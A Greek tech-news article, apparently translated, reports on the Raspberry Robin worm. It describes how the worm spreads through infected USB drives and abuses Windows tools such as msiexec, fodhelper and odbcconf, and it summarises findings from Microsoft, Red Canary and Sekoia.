Raspberry Robin dangerous worm on Windows networks

Microsoft discovered a Windows worm in the networks of hundreds of organizations from various industries.

The malware, called Raspberry Robin, spreads via infected USB devices and was first detected in September 2021 by Red Canary analysts.

raspberry robin windows

Security firm Sekoia found the same worm using QNAP NAS devices as command and control (C2) servers in early November [PDF], while Microsoft said it discovered malicious packages linked to this worm created in 2019.

Redmond's findings are very much in line with those of Red Canary's Detection Engineering team, which also detected this worm in several of its customers' networks.

Although Microsoft noticed the malware connecting to addresses on the Tor network, the attackers have yet to touch their victims' computers despite already having access.

Malware can bypass User Account Control (UAC) on infected systems using certain Windows tools.

As we already mentioned, Raspberry Robin spreads to Windows systems via infected USB drives containing a malicious .LNK file.

Once the USB device is connected and the user clicks connect, the worm creates an msiexec process using cmd.exe to launch a malicious file stored on the infected USB.

It infects new Windows devices, communicates with command and control (C2) servers, and runs malicious packages using various Windows utilities:

  • fodhelper (a trusted Windows executable),
  • msiexec (Windows Installer command line component),
  • and odbcconf (a tool for configuring ODBC drivers).

The security researchers who discovered Raspberry Robin have not yet identified where it came from but are still looking for the malicious developers' digital footprints.

Microsoft has already labeled this campaign "high risk," as attackers can download and deploy additional malware on their victims' networks. Of course they can start causing damage at any time.

iGuRu.gr The Best Technology Site in Greecefgns

Microsoft, Raspberry robin, Windows, iguru

Written by giorgos

George still wonders what he's doing here ...

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).